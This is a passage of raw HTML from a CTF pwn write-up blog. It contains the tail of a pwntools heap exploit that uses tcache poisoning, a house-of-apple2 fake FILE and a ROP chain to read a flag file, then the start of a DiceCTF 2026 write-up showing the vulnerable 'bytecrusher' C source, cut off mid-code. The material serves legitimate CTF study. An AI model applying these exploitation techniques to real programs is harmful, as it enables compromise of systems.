class="s1">&#39;utf-8&#39;</span><span class="p">),</span> <span class="mi">16</span><span class="p">)</span> <span class="o">-</span> <span class="mh">0x29d90</span> </span></span><span class="line"><span class="cl"><span class="n">leak</span><span class="p">(</span><span class="s1">&#39;libc.address&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">admin_login</span><span class="p">(</span><span class="n">pwd</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">createtask</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;WWW&#39;</span><span class="p">,</span> <span class="mh">0x48</span><span class="p">)</span> <span class="c1"># init_chunk</span> </span></span><span class="line"><span class="cl"><span class="n">createtask</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;WWW&#39;</span><span class="p">,</span> <span class="mh">0x48</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">createtask</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;WWW&#39;</span><span class="p">,</span> <span class="mh">0x48</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">deletetask</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">deletetask</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">deletetask</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">7</span><span class="p">):</span> <span class="c1"># fill tcache</span> </span></span><span class="line"><span class="cl"> <span class="n">createtask</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">(),</span> <span class="mh">0x1d8</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">7</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">deletetask</span><span class="p">(</span><span class="n">i</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">createtask</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;AAA&#39;</span><span class="p">,</span> <span class="mh">0xd8</span><span class="p">)</span> <span class="c1"># build overlap</span> </span></span><span class="line"><span class="cl"><span class="n">createtask</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;AAA&#39;</span><span class="p">,</span> <span class="mh">0xf8</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">createtask</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;AAA&#39;</span><span class="p">,</span> <span class="mh">0xd8</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">createtask</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;AAA&#39;</span><span class="p">,</span> <span class="mh">0xd8</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span> <span class="o">*</span> <span class="mh">0xd8</span> <span class="o">+</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\xe1</span><span class="s1">&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">edittask</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mh">0xd9</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">deletetask</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">createtask</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;AAA&#39;</span><span class="p">,</span> <span class="mh">0xf8</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">deletetask</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">createtask</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;AAA&#39;</span><span class="p">,</span> <span class="mh">0xd8</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">deletetask</span><span class="p">(</span><span class="mi">3</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">deletetask</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">querytask</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span> <span class="c1"># leak heap</span> </span></span><span class="line"><span class="cl"><span class="n">ru</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39; =&gt; &#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">heap</span> <span class="o">=</span> <span class="n">decodenext</span><span class="p">(</span><span class="n">uu64</span><span class="p">(</span><span class="n">r</span><span class="p">(</span><span class="mi">6</span><span class="p">)))</span> <span class="o">-</span> <span class="mh">0x2940</span> </span></span><span class="line"><span class="cl"><span class="n">leak</span><span class="p">(</span><span class="s1">&#39;heap&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">=</span> <span class="n">p64</span><span class="p">(</span><span class="n">safelinking</span><span class="p">(</span><span class="n">heap</span> <span class="o">+</span> <span class="mh">0x2000</span><span class="p">,</span> <span class="n">heap</span> <span class="o">+</span> <span class="mh">0xf0</span><span class="p">))</span> <span class="c1"># tcache poisoning</span> </span></span><span class="line"><span class="cl"><span class="n">edittask</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mh">0x8</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">createtask</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;AAA&#39;</span><span class="p">,</span> <span class="mh">0xd8</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">createtask</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;AAA&#39;</span><span class="p">,</span> <span class="mh">0xd8</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">stderr</span> <span class="o">=</span> <span class="n">libc</span><span class="o">.</span><span class="n">symbols</span><span class="p">[</span><span class="s1">&#39;_IO_2_1_stderr_&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">=</span> <span class="n">p64</span><span class="p">(</span><span class="n">stderr</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">stderr</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">edittask</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="mh">0x16</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">createtask</span><span class="p">(</span><span class="mi">6</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;BBB&#39;</span><span class="p">,</span> <span class="mh">0xe0</span><span class="p">)</span> <span class="c1"># house of apple2</span> </span></span><span class="line"><span class="cl"><span class="n">fake_io</span> <span class="o">=</span> <span class="n">flat</span><span class="p">({</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x0</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x10</span><span class="p">:</span> <span class="sa">b</span><span class="s1">&#39;flag</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x28</span><span class="p">:</span> <span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;setcontext&#39;</span><span class="p">]</span> <span class="o">+</span> <span class="mh">0x3d</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x38</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="c1"># RDI</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x40</span><span class="p">:</span> <span class="n">stderr</span> <span class="o">+</span> <span class="mh">0x20</span><span class="p">,</span> <span class="c1"># RSI</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x58</span><span class="p">:</span> <span class="mh">0x400</span><span class="p">,</span> <span class="c1"># RDX</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x70</span><span class="p">:</span> <span class="n">stderr</span> <span class="o">+</span> <span class="mh">0x20</span><span class="p">,</span> <span class="c1"># RSP</span> </span></span><span class="line"><span class="cl"> <span class="mh">0X78</span><span class="p">:</span> <span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;read&#39;</span><span class="p">],</span> <span class="c1"># RIP</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x88</span><span class="p">:</span> <span class="n">stderr</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mh">0xA0</span><span class="p">:</span> <span class="n">stderr</span> <span class="o">-</span> <span class="mh">0x30</span><span class="p">,</span> <span class="c1"># __rdx__</span> </span></span><span class="line"><span class="cl"> <span class="mh">0xB0</span><span class="p">:</span> <span class="n">stderr</span> <span class="o">-</span> <span class="mh">0x40</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mh">0xD8</span><span class="p">:</span> <span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;_IO_wfile_jumps&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="p">},</span> </span></span><span class="line"><span class="cl"> <span class="n">filler</span><span class="o">=</span><span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x00</span><span class="s2">&#34;</span> </span></span><span class="line"><span class="cl"><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">edittask</span><span class="p">(</span><span class="mi">6</span><span class="p">,</span> <span class="mh">0xe0</span><span class="p">,</span> <span class="n">fake_io</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">logout</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="n">exit</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">pop_rax_ret</span> <span class="o">=</span> <span class="n">libc</span><span class="o">.</span><span class="n">address</span> <span class="o">+</span> <span class="mh">0x45eb0</span> </span></span><span class="line"><span class="cl"><span class="n">pop_rdi_ret</span> <span class="o">=</span> <span class="n">libc</span><span class="o">.</span><span class="n">address</span> <span class="o">+</span> <span class="mh">0x2a3e5</span> </span></span><span class="line"><span class="cl"><span class="n">pop_rsi_ret</span> <span class="o">=</span> <span class="n">libc</span><span class="o">.</span><span class="n">address</span> <span class="o">+</span> <span class="mh">0x2be51</span> </span></span><span class="line"><span class="cl"><span class="n">pop_rdx_pop_r12_ret</span> <span class="o">=</span> <span class="n">libc</span><span class="o">.</span><span class="n">address</span> <span class="o">+</span> <span class="mh">0x11f367</span> </span></span><span class="line"><span class="cl"><span class="n">syscall_ret</span> <span class="o">=</span> <span class="n">libc</span><span class="o">.</span><span class="n">address</span> <span class="o">+</span> <span class="mh">0x91316</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">rop_chain</span> <span class="o">=</span> <span class="n">flat</span><span class="p">([</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rax_ret</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mi">257</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rdi_ret</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="o">-</span><span class="mi">100</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rsi_ret</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">stderr</span> <span class="o">+</span> <span class="mh">0x10</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rdx_pop_r12_ret</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x100</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mi">0</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">syscall_ret</span><span class="p">,</span> <span class="c1"># openat(-100, &#34;flag&#34;, 0)</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rax_ret</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mi">0</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rdi_ret</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mi">3</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rsi_ret</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">stderr</span> <span class="o">+</span> <span class="mh">0x400</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rdx_pop_r12_ret</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x100</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mi">0</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">syscall_ret</span><span class="p">,</span> <span class="c1"># read(3, buf, 0x100)</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rax_ret</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mi">1</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rdi_ret</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mi">1</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rsi_ret</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">stderr</span> <span class="o">+</span> <span class="mh">0x400</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rdx_pop_r12_ret</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x100</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mi">0</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">syscall_ret</span> <span class="c1"># write(1, buf, 0x100)</span> </span></span><span class="line"><span class="cl"><span class="p">])</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;bye&#39;</span><span class="p">,</span> <span class="n">rop_chain</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">itr</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># 0x0000000000045eb0: pop rax; ret;</span> </span></span><span class="line"><span class="cl"><span class="c1"># 0x000000000002a3e5: pop rdi; ret;</span> </span></span><span class="line"><span class="cl"><span class="c1"># 0x000000000002be51: pop rsi; ret;</span> </span></span><span class="line"><span class="cl"><span class="c1"># 0x000000000011f367: pop rdx; pop r12; ret;</span> </span></span><span class="line"><span class="cl"><span class="c1"># 0x0000000000091316: syscall; ret;</span> </span></span></code></pre></td></tr></table> </div> </div>DiceCTF-2026-Quals 个人题解https://blog.ratherhard.com/post/ctf-pwn/contest/dicectf-2026-quals-wp/Tue, 10 Mar 2026 13:29:00 +0000https://blog.ratherhard.com/post/ctf-pwn/contest/dicectf-2026-quals-wp/<img src="https://blog.ratherhard.com/" alt="Featured image of post DiceCTF-2026-Quals 个人题解" /><h2 id="bytecrusher">bytecrusher </h2><h3 id="checksec">checksec </h3><p><img alt="这是什么鸭" class="gallery-image" data-flex-basis="711px" data-flex-grow="296" height="165" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://pic.ratherhard.com/post/contest/DiceCTF-2026-Quals/bytecrusher/checksec.png" width="489"></p> <h3 id="code">code </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span><span class="lnt">77 </span><span class="lnt">78 </span><span class="lnt">79 </span><span class="lnt">80 </span><span class="lnt">81 </span><span class="lnt">82 </span><span class="lnt">83 </span><span class="lnt">84 </span><span class="lnt">85 </span><span class="lnt">86 </span><span class="lnt">87 </span><span class="lnt">88 </span><span class="lnt">89 </span><span class="lnt">90 </span><span class="lnt">91 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp"> </span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp"> </span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp"> </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">admin_portal</span><span class="p">()</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Welcome dicegang admin!&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">FILE</span> <span class="o">*</span><span class="n">f</span> <span class="o">=</span> <span class="nf">fopen</span><span class="p">(</span><span class="s">&#34;flag.txt&#34;</span><span class="p">,</span> <span class="s">&#34;r&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">f</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">read</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">((</span><span class="n">read</span> <span class="o">=</span> <span class="nf">fgetc</span><span class="p">(</span><span class="n">f</span><span class="p">))</span> <span class="o">!=</span> <span class="n">EOF</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">putchar</span><span class="p">(</span><span class="n">read</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="nf">fclose</span><span class="p">(</span><span class="n">f</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;flag file not found&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">crush_string</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">input</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">output</span><span class="p">,</span> <span class="kt">int</span> <span class="n">rate</span><span class="p">,</span> <span class="kt">int</span> <span class="n">output_max_len</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">rate</span> <span class="o">&lt;</span> <span class="mi">1</span><span class="p">)</span> <span class="n">rate</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">out_idx</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">input</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">!=</span> <span class="sc">&#39;\0&#39;</span> <span class="o">&amp;&amp;</span> <span class="n">out_idx</span> <span class="o">&lt;</span> <span class="n">output_max_len</span> <span class="o">-</span> <span class="mi">1</span><span class="p">;</span> <span class="n">i</span> <span class="o">+=</span> <span class="n">rate</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">output</span><span class="p">[</span><span class="n">out_idx</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">input</span><span class="p">[</span><span class="n">i</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="n">output</span><span class="p">[</span><span class="n">out_idx</span><span class="p">]</span> <span class="o">=</span> <span class="sc">&#39;\0&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">free_trial</span><span class="p">()</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">input_buf</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">crushed</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span> <span class="n">i</span><span class="o">&lt;</span><span class="mi">16</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Enter a string to crush:</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">fgets</span><span class="p">(</span><span class="n">input_buf</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">input_buf</span><span class="p">),</span> <span class="n">stdin</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Enter crush rate:</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">rate</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">scanf</span><span class="p">(</span><span class="s">&#34;%d&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">rate</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">rate</span> <span class="o">&lt;</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Invalid crush rate, using default of 1.</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">rate</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Enter output length:</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">output_len</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">scanf</span><span class="p">(</span><span class="s">&#34;%d&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">output_len</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">output_len</span> <span class="o">&gt;</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">crushed</span><span class="p">))</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Output length too large, using max size.</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">output_len</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">crushed</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nf">crush_string</span><span class="p">(</span><span class="n">input_buf</span><span class="p">,</span> <span class="n">crushed</span><span class="p">,</span> <span class="n">rate</span><span class="p">,</span> <span class="n">output_len</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Crushed string:</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="n">crushed</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">get_feedback</span><span class="p">()</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">16</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Enter some text:</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">gets</span><span class="p">(</span><span class="n">buf</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Your feedback has been recorded and totally not thrown away.</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="cp">#define COMPILE_ADMIN_MODE 0 </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">setvbuf</span><span class="p">(</span><span class="n">stdin</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">_IONBF</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">setvbuf</span><span class="p">(</span><span class="n">stdout</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">_IONBF</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Welcome to ByteCrusher, dicegang&#39;s new proprietary text crusher!</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;We are happy to offer sixteen free trials of our premium service.</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nf">free_trial</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="nf">get_feedback</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;</span><span class="se">\n</span><span class="s">Thank you for trying ByteCrusher! We hope you enjoyed it.</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">COMPILE_ADMIN_MODE</span><span 